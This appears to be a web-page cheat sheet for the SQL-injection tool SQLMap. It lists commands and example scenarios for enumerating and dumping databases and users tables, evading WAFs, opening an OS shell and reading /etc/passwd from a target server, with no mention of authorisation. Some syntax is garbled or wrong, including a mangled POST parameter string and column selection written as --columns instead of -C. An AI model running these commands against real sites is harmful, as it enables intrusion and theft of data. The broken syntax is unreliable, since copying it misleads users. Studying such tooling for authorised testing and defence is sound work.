GO BACK TO HOME

SQLMap: Comprehensive Guide

1. Basic Usage

Target a URL with a Vulnerable Parameter:

sqlmap -u "<target-url>?param=value"

Get Database List:

sqlmap -u "<target-url>" --dbs

2. Testing with POST Data

Send a POST Request:

sqlmap -u "<target-url>" --data="param1=value1¶m2=value2"

Specify Risk and Level:

sqlmap -u "<target-url>" --data="param1=value1" --risk=3 --level=5

3. Identifying the Database Type

Check the Database Type:

sqlmap -u "<target-url>" --dbs --technique=E

4. Retrieving Database Tables

Specify the Database:

sqlmap -u "<target-url>" -D <database-name> --tables

5. Extracting Data from Tables

Dump All Data from a Table:

sqlmap -u "<target-url>" -D <database-name> -T <table-name> --dump

6. Extracting Specific Columns

Specify Columns to Dump:

sqlmap -u "<target-url>" -D <database-name> -T <table-name> --columns

sqlmap -u "<target-url>" -D <database-name> -T <table-name> --dump --columns="<column1>,<column2>"

7. Bypassing WAFs and Security Mechanisms

Use Randomized User-Agent:

sqlmap -u "<target-url>" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"

Use Proxy for Requests:

sqlmap -u "<target-url>" --proxy="http://127.0.0.1:8080"

8. Using SQLMap with Cookies

Pass Cookies for Authenticated Requests:

sqlmap -u "<target-url>" --cookie="PHPSESSID=<session-id>"

9. Handling Time-Based SQL Injection

Use Time-Based Techniques:

sqlmap -u "<target-url>" --time-sec=5 --technique=T

10. Injecting Shell Commands

Execute OS Commands:

sqlmap -u "<target-url>" --os-shell

11. Dumping Files from the Server

Dump a File:

sqlmap -u "<target-url>" --file-read="/etc/passwd"

12. Saving Output to a File

Save Results:

sqlmap -u "<target-url>" --dbs --output-dir=./output

13. Verbose Mode

Enable Verbose Output for Debugging:

sqlmap -u "<target-url>" --verbose=3

14. Documentation and Community

Refer to the SQLMap documentation for detailed usage, options, and examples. Engage in forums or communities for tips and updated techniques.

Example Scenarios

1. Basic Database Enumeration:

sqlmap -u "http://example.com/page.php?id=1" --dbs

This command retrieves a list of databases available on the target server.

2. Extracting Tables from a Specific Database:

sqlmap -u "http://example.com/page.php?id=1" -D testdb --tables

This command lists all tables in the specified database testdb.

3. Dumping Data from a Specific Table:

sqlmap -u "http://example.com/page.php?id=1" -D testdb -T users --dump

This command extracts all data from the users table in the testdb database.

4. Using POST Data for Injection:

sqlmap -u "http://example.com/login.php" --data="username=admin&password=12345"

This command tests the login endpoint for SQL injection vulnerabilities using POST parameters.

5. Extracting Specific Columns from a Table:

sqlmap -u "http://example.com/page.php?id=1" -D testdb -T users --dump --columns="username,email"

This command retrieves only the username and email columns from the users table.

6. Using Cookies for Authentication:

sqlmap -u "http://example.com/dashboard.php" --cookie="PHPSESSID=abcd1234"

This command uses a session cookie to authenticate and test for SQL injection.

7. Bypassing a Web Application Firewall (WAF):

sqlmap -u "http://example.com/page.php?id=1" --user-agent="Mozilla/5.0"

This command sends a request with a custom User-Agent header to evade detection.

8. Reading a File from the Server:

sqlmap -u "http://example.com/page.php?id=1" --file-read="/etc/passwd"

This command attempts to read the /etc/passwd file from the target server.

9. Time-Based Blind SQL Injection:

sqlmap -u "http://example.com/page.php?id=1" --time-sec=5 --technique=T

This command tests for time-based SQL injection vulnerabilities, waiting 5 seconds for each response.

10. Using Proxies:

sqlmap -u "http://example.com/page.php?id=1" --proxy="http://127.0.0.1:8080"

This command routes SQLMap traffic through a specified proxy server.

GO BACK TO HOME